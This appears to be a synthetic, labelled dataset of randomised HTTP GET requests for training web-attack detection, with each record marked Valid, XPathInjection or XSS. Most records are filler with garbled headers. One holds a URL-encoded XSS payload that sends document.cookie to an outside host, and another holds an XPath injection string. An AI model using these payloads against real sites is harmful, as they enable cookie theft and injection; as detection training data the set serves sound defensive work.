Host: 78.199.148.121
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: windows-1257;q=0.3, cp-932;q=0.8, x-mac-japanese, x-mac-icelandic;q=0.0, iso-8859-1;q=0.4
Accept-Encoding: gzip, identity;q=0.7, identity, gzip, gzip;q=0.6
Accept-Language: *;q=0.8
Cache-Control: max-stale=122
Client-ip: 255.185.181.53
Cookie: ejt=tIdz7k;tSnetsiHi1o=Rsu5iea;drop-HmNA= nr
Cookie2: $Version="667"
Date: Sun, 04 Oct 09 13:52:38 UTC
ETag: "t_0bP8amfnwUL9KrdCI"
Expect: aoukreuC
From: utidoe@qznd.net
If-Modified-Since: Thu, 29 Apr 04 21:49:04 UTC
If-Unmodified-Since: Wed, 11 Jun 08 23:05:48 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 04 Oct 05 03:12:30 CET
Max-Forwards: 571
MIME-Version: 2.7
Pragma: 6i7xh='n9he'
Proxy-Authorization: Digest uri=http://www.aSgm.net/onpfm.pdf
Authorization: stt7m heees=nnhm3bi
Range: 025-,561060-
Referer: http://rsene.de/Ssfioa/hcueri/raTHem/c5rmmd.zip
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/8.1 (Windows; U; WinNT 4.4; en-cH; rv:5.8.1) Gecko/61297405
UA-CPU: Sparc
UA-Disp: 5052,410,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 9788x122
Via: Esl/8.6 66.199.162.24:635, 9.0 www.p474vb.tiff:8749, HTTP/2.1 65.47.98.138
Transfer-Encoding: identity
Upgrade: HaT6gy/0.1
Warning: 782 www.e5rte.tiff:876 "07ituthT2yrwlHit1ah" "Sat, 29 Jul 06 07:27:58 CET"
X-Forwarded-For: 75.64.37.214
X-Serial-Number: 68319129
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43374
Start - Id: 1654
class: Valid
GET /tGAsErL/7N5gUYvEbBTWBjd0H2oC/aR.4RTggok2lUUTnqUU/rJsx/alsdaalAljntyuoinEj.tiff?1temsije2ltninl=%5Dkysystem%3F%40ax&T6t2yZ=367 HTTP/1.0
Host: www.ltoea1enc.com
Connection: 3nthiSen
Accept: text/*
Accept-Charset: iso-8859-6;q=0.7
Accept-Encoding: identity;q=0.7, gzip;q=0.0, compress;q=0.0
Accept-Language: tfosti4t-jToichn, lerx-nrct2i3u;q=0.0, t-irEd;q=0.5
Cache-Control: max-age=471
Client-ip: 233.154.243.51
Cookie: 9undtWn=eu;edh6Tuotjide=i3V;w6rghacteTntos=~~a;s;V39hltyu=ynrdan4nu;R8lstlbKtrEhnq9=962592
Cookie2: $Version="878"
Date: Wed, 19 Jan 05 10:02:57 CET
ETag: W/"bMCVqCdZp90EHMf8XQ5"
Expect: 100-continue
From: S6tD@nser.com
If-Modified-Since: Mon, 05 Apr 04 06:01:28 GMT
If-Unmodified-Since: Sun, 21 Jun 09 02:30:56 UTC
If-Match: *
If-None-Match: "nvxhQ2q3l23iJF9C4"
If-Range: *
Max-Forwards: 25
MIME-Version: 7.4
Pragma: la='6f'
Proxy-Authorization: NTLM dG1ycjR5b3JlbmV0UnQyaDlvVGVMYWlrdGU0ejFjaW9vNm8y
Authorization: NTLM dHNveXRhb2Vuc3I5dHRhcnRzbzlpdG91ZmFodGVkUnVFbzRzYUdlc3NKbWho
Range: 076818-,251-
Referer: http://www.lial30.com/eslicnz.asp
TE: gzip;q=0.7,gzip;q=0.8,gzip
Trailer: Via
User-Agent: ldeaeet/4.7
UA-CPU: 68000
UA-Disp: 6093,2247,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8230x578
Via: HTTP/3.5 www.eeebekT.html, HTTP/6.7 www.nras.htm, eOdei/1.4 178.216.62.39
Transfer-Encoding: deflate
Upgrade: toe/3.4, erkdin/7.1, 5elTNe/2.3, n0otGk/3.5
Warning: 043 205.130.181.187:01570 "r9oi9t" "Thu, 28 Jul 05 10:14:18 GMT"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 65212341307
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1654
Start - Id: 49662
class: XPathInjection
GET /AiBj/glu_NPEty4ecfh/iiQ1b8FjB6M/mjssonaunrseUy/otlRDOd9H/Za5/Bjwindow.openA2WnodeIpH/uFzja6/yum.cfm?tliorqs=bN%2Fa%2Fte%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D952%5D++++or+++%273mie%27++%3D++++%27 HTTP/1.0
Host: www.cohE.net
Connection: close
Accept: video/mpeg
Accept-Charset: x-mac-arabic, windows-1257
Accept-Encoding: identity;q=0.3, deflate;q=0.4
Accept-Language: HBai-r5w;q=0.1, 2h-hh1s, bsc9e-Tslo6Mtn;q=0.4, ateIh-nr, eteeots-os;q=0.9
Cache-Control: only-if-cached
Client-ip: 159.125.158.213
Cookie: Dyamsgroup byLE=yr5u=oa8tmptn ylnullrrm&;5GaYbfryNnph-hm=tz;eoniiShotIievnD=wnucsmnfevbnlndc;BRKnqbpMGZ2=tYfwF3;amamrmHoHcn3=043;ltaoir=ftWJ2m9
Cookie2: $Version="12"
Date: Fri, 05 Feb 10 12:13:40 CET
ETag: "-oUkV855XGZ38_U5ND"
Expect: 100-continue
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Wed, 22 Sep 04 13:56:17 UTC
If-Unmodified-Since: Sat, 19 Nov 05 03:19:41 UTC
If-Match: "CEES_gQEnf860LuG"
If-None-Match: *
If-Range: Mon, 29 May 06 13:48:30 GMT
Max-Forwards: 727
MIME-Version: 7.2
Pragma: a5dme='ou'
Proxy-Authorization: Digest nonce
Authorization: Basic cW9pb3NzOmVvdW5t
Range: 7083-858216,-723,8872-
Referer: /kEleuaki/TtwEn/hspdnaib.swf
TE: trailers,gzip
Trailer: Date
User-Agent: tite (iKFLEQVY; z1UuObmvy; aw3fXMGqF.; sUq13gpjE)
UA-CPU: PowerPC
UA-Disp: 014,944,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 668x5866
Via: 5.4 129.10.237.16
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
Warning: 044 www.ewuqbi.js "trhiteoe9" 
X-Forwarded-For: 113.186.2.179
X-Serial-Number: 38921697
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49662
Start - Id: 26662
class: Valid
GET /0mIlkFBHQ4O/pieeohh/ncVg48/wtJqwXI/otsoynuasge65h9/-mNu/b05-xG-LO9NEmvpbpxF/oYNWe1lDBZxkT_8qs.pl?nHjdivJv5V-=soe%5DexecsP&hahii6l=i%3De&nm0yOgnem5a7rsE=743&sm0menaeu=911&rurbgeypdlsaip=cEqBmknv&0rNsomrAe=pclheeo%29BaE&arewdehAorcbs9t=6ehmt-pO&sNxvbscript5U=anEetelikes2&isatg=64559&1SsooufeaN3hu=b-&bYnbkaRzegsmef=8691078&knotYe9hq1tefec=ursd&onOterioEe=4&espeeU=t1gZJswWOx&sreL2=dd HTTP/1.0
Host: www.toaen5c.it
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-2;q=0.7, windows-1254;q=0.4, iso-8859-5, windows-1254;q=0.6
Accept-Encoding: identity
Accept-Language: ea4la05a-gngyn, je-nr
Cache-Control: no-transform
Client-ip: 163.222.128.3
Cookie: otTd=1965;einsePeheeOetrd=594448;SVVyy3hID8KW=6002
Cookie2: $Version="43"
Date: Fri, 29 Feb 08 08:59:54 UTC
ETag: W/"sCWd9J6@y1dr6qNtBNG"
Expect: eetKr7E
From: aenrotes@hoereselr.be
If-Modified-Since: Tue, 31 Jul 07 16:24:10 CET
If-Unmodified-Since: Wed, 19 Dec 07 02:34:42 GMT
If-Match: "-l0qyNDW-b6bN0KJW.s4"
If-None-Match: "_lb.FxeWC8Cnhmc"
If-Range: *
Max-Forwards: 0479
MIME-Version: 2.9
Pragma: ooes=Scd
Proxy-Authorization: iugTi esltl=eshcd
Authorization: Basic dDdkenA3OmRlMmg=
Range: -484069,7417-956,-660654
Referer: /l9nnn0rh/meeDme.swf
TE: trailers,deflate;q=0.6,deflate;q=0.1
Trailer: Accept-Charset
User-Agent: Mozilla/5.1 (Windows; U; Win 9x 0.0; po-te; rv:7.9.1) Gecko/64939321
UA-CPU: PowerPC
UA-Disp: 1414,245,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 190x433
Via: FTP/8.8 www.nims.jpg, 8.9 www.mlIuleOA.jpg, 3.7 www.mderts.css:892
Transfer-Encoding: deflate
Upgrade: dss/7.0, hee/2.6, eu9/8.4, uieiTe/9.3, ynTjo4/4.2
Warning: 638 www.oh9eua.css:9 "almetzkpnsa4" 
X-Forwarded-For: 179.71.10.144
X-Serial-Number: 210714537840
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26662
Start - Id: 48039
class: XSS
GET /0AdeobsriP8iooweliIc/OaJ9NmyY/twadFeitAeguygsab4Ls/sca1tedarmi/zAo/bOezd.-B/eI@Sye7qv9r4MCQmq_0J/c-pblWe@Qxq/egbCFLwvoz/NvsreqShhNsxsnhi4z.png?xmlWFxQF5=513&rectioeIEtd=oHxp_n&XVehdooptc8dN=tta&nhW.5Bps4=378&bttrpeyxda2aes6=%3Ca+href++++%3D+++%22+++++about%3A%3Cs%26%2399%3Bript+++%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.tastve.com%2Fcgi-bin%2Fntinieve.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E++++%22+++%3E&roesteeowtape=3fol&anu=eerh&4V7e5lyub7iTe2=37278103 HTTP/1.0
Host: www.eihsi.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-age=830
Client-ip: 57.224.52.157
Cookie: GPckW=9185736;uo7uetushcN=uscriptaxmlEaa+o5et;LVUestdinOx6K5=86;nenedwcino3= atqo
Cookie2: $Version="85"
Date: Thu, 07 Jul 05 23:15:33 CET
ETag: W/".qoIWGMLllhfrRTCZtI"
Expect: sntr=swesei6
From: uesois@ewrsoxtt.it
If-Modified-Since: Fri, 01 Jul 05 15:49:05 CET
If-Unmodified-Since: Mon, 12 Apr 04 07:01:40 GMT
If-Match: "L.-Y4av_4D01@iUUh"
If-None-Match: "FxMNT_fPkXuak5Nm8"
If-Range: Thu, 20 Jul 06 11:31:49 GMT
Max-Forwards: 5834
MIME-Version: 4.1
Pragma: e='7ebs'
Proxy-Authorization: NTLM aWV0Unpub3NwdGRuTHJ0dHd0b2RoZGl0TG1pOEhqbmhlaWhvbnc4c3R3cmk=
Authorization: Basic Nmx3bm9oZTpFbW5vdHRj
Range: -108,-2477,99-66895
Referer: /hbstus/ipc9t.pl
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/9.4 (Windows; U; WinNT 2.1; lu-ol; rv:9.1.2) Gecko/58219646
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 960x8995
Via: zirf/4.5 www.1f6n.html, 5.4 51.103.65.244:75652, 6.3 www.tu1s.jpeg
Transfer-Encoding: deflate
Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 698729021
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48039
Start - Id: 20471
class: Valid
GET /7passwdBgXiframeLToF28-Q/s2q/b70JpCr@.jsp?ingllqickc=ovClTbjn4&eewsi=8483624429&av=4&spuxo9fbj=il1re+nslxtu&sh=o%2BI%5C&ncdi=9430493&erfm6=llxN%24&eesabeeshyaixhi=8980248&7eapoidcNT=izgb5y0Bel&pnd58nsnRrsesa=8 HTTP/1.0
Host: 117.80.125.121:80
Connection: s3heoge
Accept: text/*;q=0.1
Accept-Charset: iso-10646-ucs-2;q=0.3, iso-8859-3;q=0.2, x-mac-turkish, x-mac-icelandic, windows-1255
Accept-Encoding: compress, gzip
Accept-Language: n-umtpcu;q=0.6, tskgttoa-8, teto-se6hifh;q=0.1, iqEh-yeontona, ir9extwt-mttpso0p;q=0.1
Cache-Control: no-store
Client-ip: 164.13.187.97
Cookie: deneh=321241;Gcw2eeohehfrhia=ynootT2rreplaceenl;hOtYie5c=KtttexH
Cookie2: $Version="2"
Date: Mon, 26 Apr 10 21:08:02 UTC
ETag: "hkY5YJB0kkpxvVfoc"
Expect: ogeh=nqe4t4ie;nrlvx
From: nEews@dw3jo7epe.net
If-Modified-Since: Sun, 28 Nov 04 14:49:01 GMT
If-Unmodified-Since: Fri, 07 Sep 07 21:24:23 UTC
If-Match: "@cWdRfDJfRkmyBNy4F"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic bG5yZWNpOmlubzc=
Authorization: asoseo etbic7ht=w2nE
Range: -896,61-724379,-171
Referer: /n9d9s9/hih2Eae/fme48na8/Ui8eErm/egevaa7b.doc
TE: trailers
Trailer: From
User-Agent: Mozilla/3.4 (X11; U; Linux i386 7.4; sg-lm; rv:5.8.6) Gecko/60772244
UA-CPU: MIPS
UA-Disp: 7837,8388,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3372x6941
Via: 0.8 100.65.36.237:155, tdkfa/3.2 158.133.155.17, uettha/7.2 132.61.62.46
Transfer-Encoding: deflate
Upgrade: qrcge/0.3, lfahc/7.7
Warning: 472 www.epya.gif "UtaynVTEe0" 
X-Forwarded-For: 209.155.150.199
X-Serial-Number: 5549122
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20471
Start - Id: 25850
class: Valid
GET /tbEacDG71qKB/mpDmTW@3W/niyluvsef/iDKIHYtN.knPOPbHJjJ/pmcP7n/taIES2GHolP_600RLCr/s137NmcCY/hKEPV.cgi?iha3Etrct=enrhupehlet&n7DwsanA56=9ledtstror&entIe=492277&3sxnGxtS=3&msnbotPltr=3N5DfwBI&fbSoy=eitrbarl&eralattelVsnaa=5caja&DaEJ1betweennE5WdJ=hcSnqbnrac%3Dd&doghwoqaoc7gio3=bbs2hgraestjiDenb&@4n0GncfjjRr=87510&yrYteim=%40h%26%7Ei&ij=7 HTTP/1.1
Host: www.aaaethddn.ch
Connection: close
Accept: video/*;q=0.5, text/html;q=0.6, audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=20852
Client-ip: 142.13.103.175
Cookie: Vxsock_streamxsysteme2ajgaC=saoEn8;BreplaceBJL9CH8=autoexeca2d;tigytemNtn1en=80979
Cookie2: $Version="1"
Date: Mon, 16 Nov 09 07:41:26 GMT
ETag: "gwk-ADSjrb1btVvr"
Expect: eRtiaee=hsidIt2s
From: s00aaipg@h6f6p.com
If-Modified-Since: Sun, 17 Apr 05 04:13:37 GMT
If-Unmodified-Since: Tue, 10 Mar 09 16:33:04 UTC
If-Match: *
If-None-Match: *
If-Range: "Lfcq4p4yIm5J6sdSj"
Max-Forwards: 6
MIME-Version: 9.1
Pragma: sAsut='ika'
Proxy-Authorization: lpm4t aNaOhes=tssi
Authorization: x7oes0 4cwcl=stsnerf
Range: -434
Referer: /onohtt6/esDx/iaga3E/tmanoojs.fgf
TE: chunked;q=0.7,deflate;q=0.9
Trailer: Via
User-Agent: Mozilla/3.5 (Windows; U; Win98 5.8; ta-Bp; rv:0.0.8) Gecko/45994987
UA-CPU: 68000
UA-Disp: 3806,956,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 836x634
Via: HTTP/0.2 www.avhntpce.htm
Transfer-Encoding: deflate
Upgrade: IuMf/4.2, qotH/5.2, nsgah/4.2, nTi/6.8
Warning: 430 4.80.20.99 "go7tpeadnR8aoEojob8" "Wed, 21 Sep 05 10:38:47 CET"
X-Forwarded-For: 99.126.193.7
X-Serial-Number: 50565
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25850
Start - Id: 29142
class: Valid
GET /sfD/acqp9IsPAGdkj7pKMyc/lpfmqDpCibgsLR/i7nCzkoyOOcBZ/XXo/t9iYqyO/6seieoeennacmu9t3/zuIA7B/ae.nsf?PrM3G97Y6where=erl HTTP/1.0
Host: www.tetln.uk
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: macintosh, x-mac-japanese;q=0.0, isiri-3342
Accept-Encoding: compress;q=0.5
Accept-Language: rdcbr-en;q=0.1, nedEIloA-ppd;q=0.0
Cache-Control: max-age=392
Client-ip: 155.217.178.62
Cookie: wsttOet=1ebH-_FiX
Cookie2: $Version="4"
Date: Tue, 07 Mar 06 24:24:13 GMT
ETag: "2fcfWijE.03EDxaTmu"
Expect: 100-continue
From: o6sF@ibcs.cz
If-Modified-Since: Sun, 22 Nov 09 08:54:18 UTC
If-Unmodified-Since: Thu, 08 Jan 09 16:40:24 CET
If-Match: *
If-None-Match: *
If-Range: "jC2HAdGS5UC7gulXF"
Max-Forwards: 4
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: r6cRja o1ns=aoel
Authorization: aeucof rrpoheeq=npBlr
Range: -6
Referer: http://www.95tte.biz/1eetSr/rabtEds/diyNfoe/mhio.php3
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/5.2 (compatible; MSIE 7.7; Open BSD i386; crisheor)
UA-CPU: Sparc
UA-Disp: 3256,3323,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 466x304
Via: 5.4 www.rwioi.jpeg, FTP/5.4 www.ak3QR.css, HTTP/3.8 223.115.50.71
Transfer-Encoding: eOa3r; tnd2lgoa=nycidv
Upgrade: ec9/9.0, tdi/9.7, rri/1.9, iedD92/0.3, piyrsf/0.2
Warning: 235 www.aliaS.js "ienttr9bl" 
X-Forwarded-For: 15.219.134.176
X-Serial-Number: 1881707
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29142
Start - Id: 24618
class: Valid
GET /4tceoan0speofboi/5nUdoieattrhFd/rJKltax/aAwaGraotmeLfcGE9n/w-t-qfLx8g/oaeasuBaeutkluH.js?Rintpindl=eaceptehRde&euiodtt5osu=28015195 HTTP/1.1
Host: 136.151.97.250
Connection: close
Accept: text/xml, application/rtf;q=0.5, audio/basic;q=0.8
Accept-Charset: iso-8859-7;q=0.6, x-mac-arabic;q=0.3, iso-8859-9;q=0.5, windows-1250;q=0.2
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 63.118.153.135
Cookie: 2i8zwget@u_=32469374;meR2untedtssc=7841
Cookie2: $Version="89"
Date: Sat, 22 Mar 08 08:14:59 GMT
ETag: W/"gxM-KAWB7.0f.MAhdFV"
Expect: 100-continue
From: tgmyAbC@mwndiie.gov
If-Modified-Since: Fri, 11 May 07 17:41:13 UTC
If-Unmodified-Since: Thu, 17 Nov 05 24:21:24 CET
If-Match: *
If-None-Match: "Zimx3-zZ7.BK_Otv"
If-Range: "8ZvR9iJ6Msb25zM"
Max-Forwards: 5
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest username="priNoo8"
Authorization: Digest qop=auth-int
Range: -633614,846-,145-
Referer: /mnrntp/lottd/Svyael/moFe.php3
TE: gzip;q=0.0,gzip
Trailer: Host
User-Agent: ytsaua (1BFesU)
UA-CPU: StrongARM
UA-Disp: 678,816,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4948x889
Via: iij/9.4 www.sirx.htm, HTTP/0.0 www.Bmnb.js, FTP/1.5 www.recsi.jpg
Transfer-Encoding: gzip
Upgrade: lha/0.0, onynn/5.1, e0f2s5/9.2, leAc/8.0
Warning: 725 www.hdse.js "umrhh5ybso" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 562281573568029685
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24618
Start - Id: 10288
class: Valid
GET /dmQ/cihfccdNreeRsshwt/eermnfrnt/h.obP_MdDDz7N1EM/sG8JPAPZO/oZot/uK.MM@GzA/rigoTlfdsio/ts4oaeonbL6miua/nnMsmeDundnmq/oQ7FkXWMG/raenv1ngrs05atPau.bin?otwunm=thvB9iqUy&CcemsfIslla=721&aqmolhiatdr=logtiAh&aihmu57=lO8Nj0A&Idmochanetcat-divTaE=eosemtd0lKe&rQmtsi4=lidt+e5atruhwindow.open&s7fi3Ngj4sauteh=ret+insertacmSiw&tp4rwurh=ns-N&d9ntenzneoyfOtn=4063 HTTP/1.1
Host: 227.172.225.107
Connection: keep-alive
Accept: application/x-tar, image/gif, video/*;q=0.0
Accept-Charset: windows-1251;q=0.8, windows-874
Accept-Encoding: deflate, identity;q=0.1
Accept-Language: *
Cache-Control: max-stale=1807
Client-ip: 207.49.125.231
Cookie: GNu-OmA=ttgFNieprut4ta;scriptRpfrX=esrh0eeeiiojt;edtrzi=244679;4Tlteeu6hnye=288;etmnthtoc=rV8VdgBsMc;bm=47823120
Cookie2: $Version="2"
Date: Mon, 24 Apr 06 09:06:50 CET
ETag: W/"4P2Ug0TqDrrOHlC"
Expect: eagsw=a7kohoue;teaoe
From: yeiwtd@pnstn5nxr.com
If-Modified-Since: Wed, 01 Feb 06 21:17:28 CET
If-Unmodified-Since: Sat, 03 Jan 09 17:57:22 CET
If-Match: "Tikvh32qy7oWeShbVRU"
If-None-Match: "2oOTfO13qDDukDsxp"
If-Range: Fri, 23 Dec 05 11:39:28 UTC
Max-Forwards: 1902
MIME-Version: 1.9
Pragma: oyco='eagrld'
Proxy-Authorization: gx9nas 4au7d=n9Ge
Authorization: nwTa etthr=ch6o
Range: 12-5596
Referer: /MskcE.php
TE: deflate
Trailer: Via
User-Agent: 5rriigcpE (cTyaPTeO; lrg8wx5; expIwixh.; 9gtgI_GVw9)
UA-CPU: x86
UA-Disp: 118,0565,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 032x7737
Via: FTP/5.0 www.jAeR.jpg, 5.3 www.2iou.css
Transfer-Encoding: 7h7i; nqacmb=ny6spohe
Upgrade: lxaa/1.4, oOw/0.1, hlr5e/7.5
Warning: 190 www.iomdhe.css "SerawenwmntclI" 
X-Forwarded-For: 141.21.14.128
X-Serial-Number: 24986038742503918311
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 10288
Start - Id: 20256
class: Valid
GET /4qmnonweMeoelatnyt.htm?snds0tdoh=o&SfaaB=eXyerstehh&8a2oakls5lwbe=c0a%24gy&adqhUoeaj4s=a5%40sjy&cl4aioi=eeldtt6nSigxrhAoz&sceoisumlDHeaE=1523&txilou0lzxva=skaye4e&1m4eiNmuS7e=ZWezhlirdio&memum=ejnHs7pOst&fmpHwlmL=gs&dnOaa5gk2terng7=eea7n%28agnA&a8ksezdiic=ei9a5zlede&FbetweenzStOk=63 HTTP/1.1
Host: 95.43.91.199
Connection: keep-alive
Accept: audio/*
Accept-Charset: x-mac-greek;q=0.6, iso-8859-5, x-mac-arabic, x-mac-chinesetrad;q=0.1
Accept-Encoding: 
Accept-Language: 1m-oNn;q=0.8, 4iiooj-4apqsjl
Cache-Control: min-fresh=36
Client-ip: 179.205.122.247
Cookie: mtthlFeOtndA=oons7HOewae8opa
Cookie2: $Version="389"
Date: Sun, 01 Nov 09 15:21:09 GMT
ETag: "iEZP8ro98GrV783BqH5"
Expect: 100-continue
From: eoean@ohdnpug.com
If-Modified-Since: Tue, 02 Feb 10 14:34:10 UTC
If-Unmodified-Since: Thu, 23 Mar 06 02:00:57 UTC
If-Match: *
If-None-Match: "pnGNIm8@0lJe_xR"
If-Range: Sat, 12 Dec 09 19:47:27 UTC
Max-Forwards: 450
MIME-Version: 8.3
Pragma: K0c=niit
Proxy-Authorization: wd94db gsNbmqhR=ptetde
Authorization: nc06 8euR=efsco
Range: 90-31589,62-
Referer: /8loie/8vTp.fgf
TE: trailers,deflate;q=0.3
Trailer: Warning
User-Agent: bnnyoR
UA-CPU: MIPS
UA-Disp: 161,462,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5244x4518
Via: 1.4 200.104.155.155:8, HTTP/2.4 139.161.161.130, mveei/4.3 122.178.68.152:4
Transfer-Encoding: identity
Upgrade: 6Nl/9.6, iln/2.9
Warning: 407 www.lti8nm6y.gif "4cis0daFde" 
X-Forwarded-For: 53.85.23.141
X-Serial-Number: 11361465282
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 20256
Start - Id: 1097
class: Valid
GET /erel/rAV/trmav/ieasofi2a.mspx? HTTP/1.1
Host: 70.183.109.253
Connection: i9Es
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: gzip, identity;q=0.5, deflate;q=0.3, deflate
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 44.94.35.250
Cookie: npeivMLsy=i7D5h2vJ@Q-;3cfrapzly=rso4c9uepWr9eTd;qeBj2dDYA8e2=425525602;qwe=r.HebIV152be
Cookie2: $Version="356"
Date: Mon, 14 Feb 05 12:47:56 GMT
ETag: W/"CLMnrtpnGcA_ZQp"
Expect: i7nbBch=r4rzda;rqwr=tMmjzte
From: hsrtboi@onni.cz
If-Modified-Since: Thu, 04 Sep 08 15:03:38 UTC
If-Unmodified-Since: Sat, 28 Nov 09 01:44:38 CET
If-Match: "egqQiKLL5YTL7@9"
If-None-Match: "rhgY4nT0Fw@D7SJ5wT"
If-Range: Mon, 08 Sep 08 03:43:55 GMT
Max-Forwards: 908
MIME-Version: 9.9
Pragma: np=wmo
Proxy-Authorization: NTLM b3N4Z2dodHNhcnl5ZWhmcmZvMWd5cnhybm50ZmhyYWVlYm5hN3RvdG5jcw==
Authorization: Basic bmkwaG9DOmV1bmN0
Range: 634551-,48052-6687,-9
Referer: /ste5ts/goir9tp.aspx
TE: trailers,chunked;q=0.8,chunked;q=0.8
Trailer: If-Modified-Since
User-Agent: a.d_Gka http://www.boytaer.gov
UA-CPU: StrongARM
UA-Disp: 465,0552,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8837x3320
Via: HTTP/5.9 www.tofed.shtml, FTP/3.8 www.t3Eeti.html
Transfer-Encoding: i9la3; nkoj=lsosdp
Upgrade: naoiE7/1.4, Zee1m6/8.6, 40Hci1/1.3, 6iCotl/8.9
Warning: 887 www.ehmEnb04.htm:93 "h3gfakch" 
X-Forwarded-For: 202.230.15.64
X-Serial-Number: 627934
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1097
Start - Id: 2107
class: Valid
GET /mPVo/esde9gnt6rustecext/aTZtoessIlsb11sd/gt/fCGyzK/e6wpb/igHEEgrXfdCautoexecT./egwoNdppmtl6iinSnde5.png? HTTP/1.0
Host: www.icisisTlc.biz:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: eo-aobc, enmefOlr-iTa;q=0.5, hr-naaieii;q=0.4, u4-alsi, bqAd-ae;q=0.5
Cache-Control: only-if-cached
Client-ip: 152.109.97.244
Cookie: uin=2&ag5;tcwbtpwsvhe=femRiaooohlafine
Cookie2: $Version="7"
Date: Sun, 25 Jan 04 13:02:09 GMT
ETag: W/"q8cmxRdF9pNsuulE7TC"
Expect: 100-continue
From: nl0fyslt@tlSn3roowo.be
If-Modified-Since: Tue, 22 Jul 08 23:43:11 UTC
If-Unmodified-Since: Sun, 01 Jun 08 05:59:56 CET
If-Match: "oZPPgyE-8_c9GVr"
If-None-Match: "yLoQfPBdqyIhjtHEl"
If-Range: Sat, 24 Nov 07 08:19:33 GMT
Max-Forwards: 4
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM c3RpYW93ZHJybG1ybmhoM3N5eEVjaG5OM3dpc2VCc2dhZXlvMTFjZ2QxYw==
Authorization: Digest response="5E07471bb944aF57CD47C235c6389bdB"
Range: 621-,04-,-085540
Referer: http://www.tadh.gov/ea5udi/coyA/etecghAe/TonRl.msf
TE: trailers
Trailer: Upgrade
User-Agent: rsjsstb
UA-CPU: Sparc
UA-Disp: 4115,383,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3159x969
Via: 7.3 239.109.228.106
Transfer-Encoding: gzip
Upgrade: gknraU/3.9, fTtni/6.7, lssm/8.2, Jw7uEL/4.0
Warning: 551 www.azMe.gif "eLopsrhhmd3yte9t3h" 
X-Forwarded-For: 132.82.181.214
X-Serial-Number: 86831
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2107
Start - Id: 30230
class: Valid
GET /yohluofR2o3melykzttL/phE/7includefyug/cgRselect5APB/ikS9_MDo.PxH-JUOv4/ofV@XR/bn/duO-HUMMYYl..8MD.mspx?ha=Iilh5Xp3r2%5Cea%28&myan=Nh30i&dgr=+0o%28+h%5Dtr-8e&rafyenihcfij=eaat5%7Ch&ftOywda5bEtSN=a1AVq5juN9T&r2tbito=eyr%3Fme&nss=hf%7EP&4eaod=roN6f.oet&onntoa=2952700&rgjesvau=19939&H7r2iibkdrt=ass%29%25n61formste%25a&tA=4792&2Sktfht9icdbr=5136&w53eH=Gye HTTP/1.1
Host: 167.188.26.44
